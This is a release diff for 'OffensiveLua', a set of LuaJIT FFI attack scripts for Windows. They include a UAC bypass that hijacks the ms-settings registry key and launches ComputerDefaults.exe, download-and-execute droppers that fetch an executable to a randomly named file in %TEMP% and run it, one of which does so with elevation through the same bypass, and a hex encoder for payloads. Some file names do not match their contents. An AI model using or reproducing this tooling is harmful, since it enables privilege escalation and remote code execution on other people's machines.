OffensiveLua v0.1 release

Author: covecredit

Diff for: ComputerDefaultsUACBypass.lua

@@ -0,0 +1,84 @@
+-- This uses ComputerDefaults.exe to bypass UAC prompts
+-- from Lua with FFI. Luajit.exe runs under SysWOW64 so
+-- only x86 payloads or adaptions of them will work. This
+-- uses registry editing, some registry bugs are x64 only.
+--
+-- tested Windows 11 Desktop Version 10.0.22621.2428
+local ffi = require("ffi")
+
+-- The payload to run
+local cmdpayload = "cmd.exe"
+
+-- Load the Windows Registry API library
+local advapi32 = ffi.load("advapi32")
+
+-- Define Windows API functions and constants
+ffi.cdef[[
+    typedef void* HKEY;
+    typedef unsigned long DWORD;
+    typedef long LONG;
+    typedef const char* LPCSTR;
+
+    LONG RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, HKEY* phkResult);
+    LONG RegCreateKeyA(HKEY hKey, LPCSTR lpSubKey, HKEY* phkResult);
+    LONG RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey);
+    LONG RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const void* lpData, DWORD cbData);
+    void SetLastError(DWORD dwErrCode);
+    void* GetProcessHeap();
+    void* HeapAlloc(void* hHeap, DWORD dwFlags, size_t dwBytes);
+    void HeapFree(void* hHeap, DWORD dwFlags, void* lpMem);
+]]
+
+-- Constants
+local HKEY_CURRENT_USER = ffi.cast("HKEY", 0x80000001)
+local REG_SZ = 1
+
+-- Function to write a registry value
+function writeRegistryValue(key, subKey, valueName, valueData)
+    local hKey = ffi.new("HKEY[1]")
+    local result = advapi32.RegCreateKeyA(key, subKey, hKey)
+
+    if result == 0 then
+        local data = ffi.new("const char[?]", #valueData + 1, valueData)
+        local dataSize = ffi.sizeof(data)
+
+        result = advapi32.RegSetValueExA(hKey[0], valueName, 0, REG_SZ, data, dataSize)
+
+        if result == 0 then
+            return true
+        end
+    end
+
+    return false
+end
+
+-- Function to delete a registry key and its subkeys using RegDeleteTree
+function deleteRegistryTree(key, subKey)
+    local result = advapi32.RegDeleteTreeA(key, subKey)
+    
+    if result == 0 then
+        return true
+    end
+
+    return false
+end
+
+-- Example usage to write a registry value
+local success = writeRegistryValue(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command", "DelegateExecute", "")
+local success = writeRegistryValue(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command", "", cmdpayload)
+if success then
+    print("Successfully wrote the registry value.")
+    
+    -- Execute ComputerDefaults.exe to bypass UAC prompts
+    os.execute("C:\\Windows\\Syswow64\\ComputerDefaults.exe")
+    
+    -- Example usage to delete the registry key and its subkeys
+    local deleteSuccess = deleteRegistryTree(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command")
+    if deleteSuccess then
+        print("Successfully deleted the registry key and its subkeys.")
+    else
+        print("Failed to delete the registry key and its subkeys.")
+    end
+else
+    print("Failed to write the registry value.")
+end

Diff for: bin2hex.lua

@@ -0,0 +1,44 @@
+-- Output a file as hex for use with binrun.lua and binrundll.lua
+
+local ffi = require("ffi")
+
+-- Function to read a file and return its content as a hex array
+local function readFileAsHexArray(filePath)
+    local file = io.open(filePath, "rb")
+    if not file then
+        return nil
+    end
+
+    local content = file:read("*all")
+    file:close()
+
+    local hexArray = {}
+    for i = 1, #content do
+        local byte = string.byte(content, i)
+        table.insert(hexArray, string.format("\\x%02X", byte))
+    end
+
+    return hexArray
+end
+
+-- Main function
+local function main()
+    local filePath = arg[1]
+
+    if not filePath then
+        print("Usage: lua script.lua <file_path>")
+        return
+    end
+
+    local hexArray = readFileAsHexArray(filePath)
+
+    if not hexArray then
+        print("Failed to open or read the file.")
+        return
+    end
+
+    -- Print the hex array as a C-style array for scripts
+    print("local data = \"" .. table.concat(hexArray, "") .. "\";")
+end
+
+main()

Diff for: binrun.lua

@@ -0,0 +1,21 @@
+local ffi = require("ffi")
+
+-- Define the necessary Windows API functions and constants
+ffi.cdef[[
+   bool AllocConsole();
+   bool FreeConsole();
+   int printf(const char *format, ...);
+   int GetLastError();
+]]
+
+-- Allocate a console
+if ffi.C.AllocConsole() == 0 then
+   print("Failed to allocate a console. Error code: " .. ffi.C.GetLastError())
+   return
+end
+
+-- Print "Hello, World" to the console
+ffi.C.printf("Hello, World\n")
+
+-- Free the console when you're done
+ffi.C.FreeConsole()

Diff for: console.lua

@@ -0,0 +1,59 @@
+-- download & exec
+-- takes a url e.g. http://127.0.0.1/Renge_x64.exe" and executes it.
+local ffi = require("ffi")
+
+-- Define the URLDownloadToFile function prototype
+ffi.cdef[[
+    typedef int HRESULT;
+    HRESULT URLDownloadToFileA(
+        void* pCaller,
+        const char* szURL,
+        const char* szFileName,
+        unsigned long dwReserved,
+        void* lpfnCB
+    );
+    void Sleep(unsigned long dwMilliseconds);
+]]
+
+-- Load the urlmon.dll library
+local urlmon = ffi.load("urlmon")
+
+-- Define the URL and file path
+local url = "http://127.0.0.1/Renge_x64.exe"
+
+-- Function to generate random string
+function generateRandomString(length)
+    local charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
+    local str = ""
+    math.randomseed(os.time())
+    for _ = 1, length do
+        local randomIndex = math.random(1, #charset)
+        str = str .. charset:sub(randomIndex, randomIndex)
+    end
+    return str
+end
+
+-- Generate a random file name with a .exe extension in the %TEMP% directory
+local tempDir = os.getenv("TEMP") or os.getenv("TMP") or "C:\\Temp"
+local localPath = tempDir .. "\\" .. generateRandomString(8) .. ".exe"
+
+-- Use URLDownloadToFile to download the file
+local result = urlmon.URLDownloadToFileA(nil, url, localPath, 0, nil)
+
+if result == 0 then
+    print("File downloaded successfully.")
+
+    -- Sleep for a moment to ensure the file is completely written
+    ffi.C.Sleep(1000)
+
+    -- Now, let's execute the downloaded file
+    local success, exitCode = os.execute(localPath)
+
+    if success then
+        print("Executable ran successfully. Exit code: " .. exitCode)
+    else
+        print("Failed to run the executable.")
+    end
+else
+    print("Failed to download the file. Error code: " .. result)
+end

Diff for: downloadexec.lua

@@ -0,0 +1,135 @@
+-- download & exec then bypass UAC elevation prompt.
+-- takes a url e.g. "http://127.0.0.1/payload.exe" 
+-- and executes it with elevated rights bypassing UAC.
+
+local ffi = require("ffi")
+
+
+-- Define the URL and file path
+local url = "http://127.0.0.1/Renge_x64.exe"
+
+-- Define the FFI function prototypes for registry and download.
+ffi.cdef[[
+    typedef int HRESULT;
+    typedef void* HKEY;
+    typedef unsigned long DWORD;
+    typedef long LONG;
+    typedef const char* LPCSTR;
+    HRESULT URLDownloadToFileA(
+        void* pCaller,
+        const char* szURL,
+        const char* szFileName,
+        unsigned long dwReserved,
+        void* lpfnCB
+    );
+    void Sleep(unsigned long dwMilliseconds);
+    LONG RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, HKEY* phkResult);
+    LONG RegCreateKeyA(HKEY hKey, LPCSTR lpSubKey, HKEY* phkResult);
+    LONG RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey);
+    LONG RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const void* lpData, DWORD cbData);
+    void SetLastError(DWORD dwErrCode);
+    void* GetProcessHeap();
+    void* HeapAlloc(void* hHeap, DWORD dwFlags, size_t dwBytes);
+    void HeapFree(void* hHeap, DWORD dwFlags, void* lpMem);
+]]
+
+-- Load the urlmon.dll library
+local urlmon = ffi.load("urlmon")
+
+-- Load the Windows Registry API library
+local advapi32 = ffi.load("advapi32")
+
+-- Constants
+local HKEY_CURRENT_USER = ffi.cast("HKEY", 0x80000001)
+local REG_SZ = 1
+
+-- Functions begin
+-- Function to generate random string
+function generateRandomString(length)
+    local charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
+    local str = ""
+    math.randomseed(os.time())
+    for _ = 1, length do
+        local randomIndex = math.random(1, #charset)
+        str = str .. charset:sub(randomIndex, randomIndex)
+    end
+    return str
+end
+
+-- Function to write a registry value
+function writeRegistryValue(key, subKey, valueName, valueData)
+    local hKey = ffi.new("HKEY[1]")
+    local result = advapi32.RegCreateKeyA(key, subKey, hKey)
+
+    if result == 0 then
+        local data = ffi.new("const char[?]", #valueData + 1, valueData)
+        local dataSize = ffi.sizeof(data)
+
+        result = advapi32.RegSetValueExA(hKey[0], valueName, 0, REG_SZ, data, dataSize)
+
+        if result == 0 then
+            return true
+        end
+    end
+
+    return false
+end
+
+-- Function to delete a registry key and its subkeys using RegDeleteTree
+function deleteRegistryTree(key, subKey)
+    local result = advapi32.RegDeleteTreeA(key, subKey)
+    
+    if result == 0 then
+        return true
+    end
+
+    return false
+end
+-- Functions end
+
+-- Generate a random file name with a .exe extension in the %TEMP% directory
+local tempDir = os.getenv("TEMP") or os.getenv("TMP") or "C:\\Temp"
+local localPath = tempDir .. "\\" .. generateRandomString(8) .. ".exe"
+
+-- Use URLDownloadToFile to download the file
+local result = urlmon.URLDownloadToFileA(nil, url, localPath, 0, nil)
+
+if result == 0 then
+    print("File downloaded successfully.")
+
+    -- Sleep for a moment to ensure the file is completely written
+    ffi.C.Sleep(1000)
+
+    -- Now, let's execute the downloaded file via UAC bypass
+    -- Example usage to write a registry value
+    local success = writeRegistryValue(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command", "DelegateExecute", "")
+    if success then
+        print("Successfully wrote the registry value.")
+    else
+        print("Failed to write to registry value.") 
+    end
+    local success = writeRegistryValue(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command", "", localPath)
+    if success then
+        print("Successfully wrote the registry value.")
+    else
+        print("Failed to write to registry value.") 
+    end
+
+    -- Execute ComputerDefaults.exe to bypass UAC prompts and run localPath (our downloaded EXE)
+    local success, exitCode = os.execute("C:\\Windows\\Syswow64\\ComputerDefaults.exe")
+    if success then
+        print("Executable ran successfully. Exit code: 0")
+    else
+        print("Failed to run the executable.")
+    end
+    -- Example usage to delete the registry key and its subkeys
+    local deleteSuccess = deleteRegistryTree(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command")
+    if deleteSuccess then
+        print("Successfully deleted the registry key and its subkeys.")
+    else
+        print("Failed to delete the registry key and its subkeys.")
+    end
+else
+    print("Failed to download the file. Error code: " .. result)
+end
+

Diff for: downloadexec_UACbypass.lua

@@ -0,0 +1,43 @@
+-- Load the FFI library
+local ffi = require("ffi")
+
+-- Define the necessary Windows API functions and constants
+ffi.cdef[[
+    typedef void* HANDLE;
+    typedef int BOOL;
+    typedef unsigned long DWORD;
+    typedef void* LPVOID;
+    HANDLE CreateFileA(const char* lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, void* lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
+    BOOL WriteFile(HANDLE hFile, const void* lpBuffer, DWORD nNumberOfBytesToWrite, DWORD* lpNumberOfBytesWritten, void* lpOverlapped);
+    BOOL CloseHandle(HANDLE hObject);
+]]
+
+-- Constants for file creation and access
+local GENERIC_WRITE = 0x40000000
+local CREATE_ALWAYS = 2
+
+-- Path to the file to be created
+local filename = "C:\\temp\\test.txt"
+
+-- Open the file using CreateFile
+local hFile = ffi.C.CreateFileA(filename, GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, nil)
+
+if hFile == nil or hFile == ffi.cast("HANDLE", -1) then
+    print("Error creating the file")
+else
+    -- Data to be written to the file
+    local data = "hello world"
+
+    -- Write the data to the file
+    local bytesWritten = ffi.new("DWORD[1]")
+    local result = ffi.C.WriteFile(hFile, data, #data, bytesWritten, nil)
+
+    if result == 1 then
+        print("File created and data written successfully.")
+    else
+        print("Error writing to the file.")
+    end
+
+    -- Close the file handle
+    ffi.C.CloseHandle(hFile)
+end